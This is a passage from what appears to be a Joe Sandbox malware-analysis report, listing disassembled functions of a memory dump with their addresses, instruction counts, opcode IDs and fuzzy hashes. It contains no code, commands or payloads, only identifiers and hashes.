                                        • Opcode Fuzzy Hash: 7810c8f649064fce25333fb3cd81a1392c2ccf1cda18344cdd399fdd13f8d6b7
                                        • Instruction Fuzzy Hash: 9A413732901206CFDB24CF5CE9A0A6ABBB5FF94708F18806ED5019B765C375E842CF90
                                        Function 013C8918 Relevance: .1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74174cc32b6d942c6aa7294d1e5cd7204558a5954933231bafcd52c4a92d34b4
                                        • Instruction ID: a4f87e713fe036d735546b65a9b7aae998b198abbb06193759c3cc8391336b3a
                                        • Opcode Fuzzy Hash: 74174cc32b6d942c6aa7294d1e5cd7204558a5954933231bafcd52c4a92d34b4
                                        • Instruction Fuzzy Hash: 764162315083169ED312DF69C840AABB7E9EF84B58F40096FF985D7260E730DE448BA3
                                        Function 013CA020 Relevance: .1, Instructions: 122COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                        • Instruction ID: f580dfa8a25277d035c3ad231066cf740da91848fd11ab8b3fb9bc6d799b13a2
                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                        • Instruction Fuzzy Hash: 16413A31A00239DBDB11DE1C8450BBAB761EB90B9DF56806FEA44CB341E6328D80C791
                                        Function 013D09AD Relevance: .1, Instructions: 122COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f52f2c0af566ea0d9f8f2b0c1fb23ff293ed6cc3116d85f91b65bf988666a67b
                                        • Instruction ID: 4b70ec133ad3ec87143a6277d4cfb33311105ba77711df0988ea609c989526d4
                                        • Opcode Fuzzy Hash: f52f2c0af566ea0d9f8f2b0c1fb23ff293ed6cc3116d85f91b65bf988666a67b
                                        • Instruction Fuzzy Hash: 94417A72600701EFE725CF19E840B26BBF8FF54718F60866AE449CB291E770E942CB91
                                        Function 01400710 Relevance: .1, Instructions: 121COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                        • Instruction ID: ea4e62b3625c75b46d8700cec8957f815d474e7a70e4b4279d5e5610838395ff
                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                        • Instruction Fuzzy Hash: 76411671A00605EFDB25CF9AC980BAABBF4FB18740B10497EE556D72A1D330EA44CB90
                                        Function 013D262C Relevance: .1, Instructions: 119COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e46d92faf1ddfa5c0d45bea8c050fa235b2cdf66b4f9fef9e6d56bac96281cee
                                        • Instruction ID: 536a2e22c13022bb7fe692a3041981833c5c11b203a45b66e970f95949b2b30f
                                        • Opcode Fuzzy Hash: e46d92faf1ddfa5c0d45bea8c050fa235b2cdf66b4f9fef9e6d56bac96281cee
                                        • Instruction Fuzzy Hash: 7741EFB2501705CFCB22EF29E900B6AB7B5FF54328F1182AEC4069B6A2DB309941CF50
                                        Function 0140C8F9 Relevance: .1, Instructions: 116COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52a50d8af975d651c4920bb45170ddffd365e47a1223fdd8ecbd5663a972d163
                                        • Instruction ID: 7ee80bd97ebe3a75b41080f57e22b7813c7eb985b55bed84deabf9afca886137
                                        • Opcode Fuzzy Hash: 52a50d8af975d651c4920bb45170ddffd365e47a1223fdd8ecbd5663a972d163
                                        • Instruction Fuzzy Hash: D13169B1A00355DFDB52CF99C080799BBF0EB19728F2181AED119EB3A1D3329942CF90
                                        Function 014507C3 Relevance: .1, Instructions: 114COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f4b0ab6f2ed60b69f86bc88be5382655d649822da5980e5be36f339d499d863
                                        • Instruction ID: d9e48102670d1d19853fc2ecf731e23a97f9654f4d05828e38c186c677ab2fea
                                        • Opcode Fuzzy Hash: 9f4b0ab6f2ed60b69f86bc88be5382655d649822da5980e5be36f339d499d863
                                        • Instruction Fuzzy Hash: 56417BB25043019FD360DF29C845F9BBBE8FF98754F108A2EF99897261E7709905CB92
                                        Function 013C80A0 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfcbeea05a81dd0f9276f8e05ea535dc7a837cb68b3adb7ae8f00469ed96b99e
                                        • Instruction ID: eb05096132b7b9a3b2ad31fac975af75b620bd720db14e945d280acedcfc4559
                                        • Opcode Fuzzy Hash: cfcbeea05a81dd0f9276f8e05ea535dc7a837cb68b3adb7ae8f00469ed96b99e
                                        • Instruction Fuzzy Hash: 02410771E0561AAFCB01DF5CC8406A9B7F5FF94B68F1082AED815A7690DB34EE418BD0
                                        Function 014505A7 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c61ea9992e75bdb70bbe2f25009496cf91f3cedad726260d58c02702dd2a9622
                                        • Instruction ID: 63f5d21aacb20ff912145a3f3941be157f37407bd8477cd739b82815e74fcec4
                                        • Opcode Fuzzy Hash: c61ea9992e75bdb70bbe2f25009496cf91f3cedad726260d58c02702dd2a9622
                                        • Instruction Fuzzy Hash: 7B41DF766046469FC320DF2CC840A6BB7E9BFC8700F14062EF998976A1E730E914C7A6
                                        Function 013D4859 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 024ff49ac3def52d65510b2c6d6d620351e51365a1c3c97e4fa0d6bbf8d8560a
                                        • Instruction ID: aa2cf68c2c81626f9a06b9e1f7ee5018a1de8828a853e222e680a9c5914b90a2
                                        • Opcode Fuzzy Hash: 024ff49ac3def52d65510b2c6d6d620351e51365a1c3c97e4fa0d6bbf8d8560a
                                        • Instruction Fuzzy Hash: B641E5722003028FD725DF2DE884B2ABBE9FF80358F14446DF6858B6A1DB70D955CB91
                                        Function 013C8B50 Relevance: .1, Instructions: 111COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a8c02348bcadbffdcf441162527d656f7648a9b6f195786f6ec04dbd27bf8298
                                        • Instruction ID: 3713a2ab69fa3d233ac4241953c8d0d78eb95ae8aecddd94f6e1f98beb66ac25
                                        • Opcode Fuzzy Hash: a8c02348bcadbffdcf441162527d656f7648a9b6f195786f6ec04dbd27bf8298
                                        • Instruction Fuzzy Hash: 984180B2A016198FCF15CF6DC98099DF7F1FF98728B1085AED466A7260DB349E41CB40
                                        Function 013E02E1 Relevance: .1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                        • Instruction ID: 3002b4f4d2e350174eebb9c9f2522028405106ea5e633aed512e19b95bfde745
                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                        • Instruction Fuzzy Hash: A731F532A04358AFDB128B6CCC48BDBBFE9AF54354F0841A6F855D7392C6B49944CBA0
                                        Function 0147E3DB Relevance: .1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ae13bca60d31a5f5fc6ed0ac1f93ba75947f3ebddbdce555a32e098125f9fcc
                                        • Instruction ID: 6c6eed1bcd5972a312d78f7a51da54f8d22c8244c3e881af6b8a71b736d0a6d1
                                        • Opcode Fuzzy Hash: 4ae13bca60d31a5f5fc6ed0ac1f93ba75947f3ebddbdce555a32e098125f9fcc
                                        • Instruction Fuzzy Hash: 3731B935740716ABDB229F698D41FAB76A8AB58B54F000179FA00BB3E1DAB4DC05C7A0
                                        Function 01484B4B Relevance: .1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a1b4731e6452a43ea5025dfe0f044e15f4e0f2d97db1059bef3aa0c062512f0
                                        • Instruction ID: 79b2466b279bf1d56a6c9de2288cc9c869cc80c3fd1f23612e577cc219e58a39
                                        • Opcode Fuzzy Hash: 9a1b4731e6452a43ea5025dfe0f044e15f4e0f2d97db1059bef3aa0c062512f0
                                        • Instruction Fuzzy Hash: C93192326052129FD321EF1DD980F2AB7E9FF84364F0A846EE9599B361D730E841DB91
                                        Function 013D4260 Relevance: .1, Instructions: 102COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fad83aabe05ff23ef3be0092acc37ad16b282b8c6153b92a0e02753573f3a51f
                                        • Instruction ID: e965e6bf76727bcec3287b16d92812d918a8b653cddc624a778e3b70602c577d
                                        • Opcode Fuzzy Hash: fad83aabe05ff23ef3be0092acc37ad16b282b8c6153b92a0e02753573f3a51f
                                        • Instruction Fuzzy Hash: F341AD36200B459FD722CF28C481B967BE9AF99718F05852EE6598B760CB70E804CB50
                                        Function 01484BB0 Relevance: .1, Instructions: 101COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cac8e4f18adfc0448483c792133fb9cfa03f2543a0c7b9d49106633f88fb55e
                                        • Instruction ID: 6750a1bd5c76df48910eb116e20c31f18271445aff6931502253648e17bf3928
                                        • Opcode Fuzzy Hash: 0cac8e4f18adfc0448483c792133fb9cfa03f2543a0c7b9d49106633f88fb55e
                                        • Instruction Fuzzy Hash: A1317E716043028FD320EF29C980B2AB7E9FB84720F0A456EF9559B3A1D730E805DB91
                                        Function 0144EB1D Relevance: .1, Instructions: 100COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d22db7e748caee5e2d1256fe6f300880ca6b509fa8c688e1aea74ce873b1faa
                                        • Instruction ID: 7cf33b4d83e2a8c406481805e5f3f388477ea5662f1ae2fa62822f42fac52cf2
                                        • Opcode Fuzzy Hash: 6d22db7e748caee5e2d1256fe6f300880ca6b509fa8c688e1aea74ce873b1faa
                                        • Instruction Fuzzy Hash: 0531B0316016D69BF322976DC948B267BD8BB40B48F1D04A6AF45AB7F2DB3CD841C224
                                        Function 014961C3 Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf32daa3bdd93eea8c50db61f0cabfa3930a0d3e0f7a73c763de1a975e974763
                                        • Instruction ID: 4e9eedd6cc8fc06ced07e08d35ae1247425c561cb7b35579f28d55b91dc51391
                                        • Opcode Fuzzy Hash: cf32daa3bdd93eea8c50db61f0cabfa3930a0d3e0f7a73c763de1a975e974763
                                        • Instruction Fuzzy Hash: D031E475A00216ABDB15DF98CD40BAEBBB5FB44740F4641AAE900AB254D770ED00CB90
                                        Function 0147483A Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 496083b7bbaab8cae78f6c725368ca3c9bc061dec6fbb7c9f6d75b4a8a83cf4d
                                        • Instruction ID: d5f735b3df33c444be9308f69fa2b0b0bef1cedeba7d01135e0aa38b01946919
                                        • Opcode Fuzzy Hash: 496083b7bbaab8cae78f6c725368ca3c9bc061dec6fbb7c9f6d75b4a8a83cf4d
                                        • Instruction Fuzzy Hash: C6314776A4012DABCF21DF69DD44BDEBBF9AB98350F1500E5E508A7260DA30DE51CF90
                                        Function 013FEB20 Relevance: .1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3aecb7f352a94b75dc4e81f8800db563bfdc55795e82fb97542d27eb1be9a8f
                                        • Instruction ID: ee732c84570a6dd354ed52680f55c8a606e2ae8785cf8691c1d4c1fbd4f77f65
                                        • Opcode Fuzzy Hash: f3aecb7f352a94b75dc4e81f8800db563bfdc55795e82fb97542d27eb1be9a8f
                                        • Instruction Fuzzy Hash: 3231EB32E04219AFDB21DFADCD44AAFBBF9EF44754F01443AE516D7260D2709E008BA0
                                        Function 014960B8 Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f86102b7643470cfc6c170a87e9974bdcaa0a2ee149a520516cfe2000eff1000
                                        • Instruction ID: 4f5883204460e92e358c712a58a17578721569a62b5fbca3009221dbe1ffd56f
                                        • Opcode Fuzzy Hash: f86102b7643470cfc6c170a87e9974bdcaa0a2ee149a520516cfe2000eff1000
                                        • Instruction Fuzzy Hash: 5B31E2B5B40212AFDB229FA9C851A6BBBB9AB84754F05406EE505DB3A1DA70DC018B90
                                        Function 013D07AF Relevance: .1, Instructions: 95COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bf596e983ff68e48160340980bd8bed7f3227a48181b07f98e6f422a1b6dd72
                                        • Instruction ID: 2f8160821331c262c4991c27458e25e48887d6619b3b080f269ab516682d3cca
                                        • Opcode Fuzzy Hash: 0bf596e983ff68e48160340980bd8bed7f3227a48181b07f98e6f422a1b6dd72
                                        • Instruction Fuzzy Hash: CE310533A04316DBC716DE68E880A6BBFA5EFD4A58F01452DFD59A7310DA30DC0187E1
                                        Function 013D8550 Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51d831ee93a880a6273890eb50f41f6689860c1753495acbed4bae2aa9ee373d
                                        • Instruction ID: ea9eaae877a8bffcb3cf4d612a93988198ec39bf0d7c5c84a5aaa0c0648ec493
                                        • Opcode Fuzzy Hash: 51d831ee93a880a6273890eb50f41f6689860c1753495acbed4bae2aa9ee373d
                                        • Instruction Fuzzy Hash: 81316DB26053018FE720CF19D840B5BFBE6FB98704F45496EEA9497361D7B0E848CB91
                                        Function 0140A6C7 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                        • Instruction ID: 0b7032c1a6f7d30619d87dc91ce8b263e31a02a5737ebd55722c2ccd25da617d
                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                        • Instruction Fuzzy Hash: 09312E72B01701AFE765CF6ECD40B57BBF8AB59650F14453EA55AC37A0E630E9008B50
                                        Function 0147EBD0 Relevance: .1, Instructions: 91COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d36bb615dafec526655c772beb6790107dc6b27f74d5861c32f870bb77670ea2
                                        • Instruction ID: 133d6c9ad7445f57592463c3ca2b02d8b7fae2da65cee2c5b0fc51dc0dc8f79b
                                        • Opcode Fuzzy Hash: d36bb615dafec526655c772beb6790107dc6b27f74d5861c32f870bb77670ea2
                                        • Instruction Fuzzy Hash: BF319C79505301CFC711DF1AC54489ABBF9FF89618F058AAEE488AB361D331D945CB92
                                        Function 013F438F Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91cb4961a5709daa9a37d9449502e77395e4165d840cd5fdccc31bbf34bb367e
                                        • Instruction ID: 6180c1f7eb5bba3e03971fa4d91a4e574374d5dc5070766a0291e6dd6742b4e9
                                        • Opcode Fuzzy Hash: 91cb4961a5709daa9a37d9449502e77395e4165d840cd5fdccc31bbf34bb367e
                                        • Instruction Fuzzy Hash: FD31D431B002059FD720EFA9C984B6FBBF9EB94308F00852ED205E76A5D730D945CB91
                                        Function 013CCB7E Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                        • Instruction ID: ea74efbac4ee61977061122d7c0489e16670487a888c6ba5fa4aaabb40438cd0
                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                        • Instruction Fuzzy Hash: A2210936E0026AAADB10DBB9C840BAFFBB5AF14744F15803ADE55E7750E270CD418790
                                        Function 013CC156 Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c45d293b25ce1e39715c73a965ce433caea79adad0f7960679e7ded496c50005
                                        • Instruction ID: fa6aade39d96e8c8da8ca17ea590f2252a405117c266d53ca7ebd9071a9ef39a
                                        • Opcode Fuzzy Hash: c45d293b25ce1e39715c73a965ce433caea79adad0f7960679e7ded496c50005
                                        • Instruction Fuzzy Hash: 6A31FC729003218BD731AF6CCC45B6A77B4AF90318F94C16ADD499B391DA78D9C6CB90
                                        Function 0148C3CD Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                        • Instruction ID: 75419bee64b0e56ef0e7e7ae343fdbf23b249fdfe6540f2545921f23210cb433
                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                        • Instruction Fuzzy Hash: 2721DB36600652A6CB15BBDA8C40AFFBBB5EF50B10F40842FFA55876B1E634D990C370
                                        Function 013CE420 Relevance: .1, Instructions: 88COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c0b27699f4e33d6ba5b2d593c0cd266825999e9fadd4b6b00754e9f451875634
                                        • Instruction ID: 5459b7a0b3104376dd55d9fc792c8122e43b411fc32a267a65cdd5a56a92ef35
                                        • Opcode Fuzzy Hash: c0b27699f4e33d6ba5b2d593c0cd266825999e9fadd4b6b00754e9f451875634
                                        • Instruction Fuzzy Hash: 9D31B632A4152C9BDB31DB18CC41FEEBBB9EB15B48F0101B9E645A7290D674DE808F90
                                        Function 01404588 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                        • Instruction ID: 515f2a89f8324b57a7eb97f871cf61951e36133b489239012d836ba14b9f2412
                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                        • Instruction Fuzzy Hash: 5A21B631A00605EBCB11DF99C980A9EBBB5FF58314F14857AEE199B290E675DA018B50
                                        Function 014044B0 Relevance: .1, Instructions: 87COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 333d7778e20790e704e555b85608c2b6915a0dc08356e5cc19269c174b41c1e2
                                        • Instruction ID: 262dcdaca68eca9c10c46a845a901d4be77f6b6c29704582f29c34f5162c11bc
                                        • Opcode Fuzzy Hash: 333d7778e20790e704e555b85608c2b6915a0dc08356e5cc19269c174b41c1e2
                                        • Instruction Fuzzy Hash: B221E3726047159BCB22DF19C840F6B77E4FB88760F05462AFF489B290D731E9018BA2
                                        Function 013CE388 Relevance: .1, Instructions: 86COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
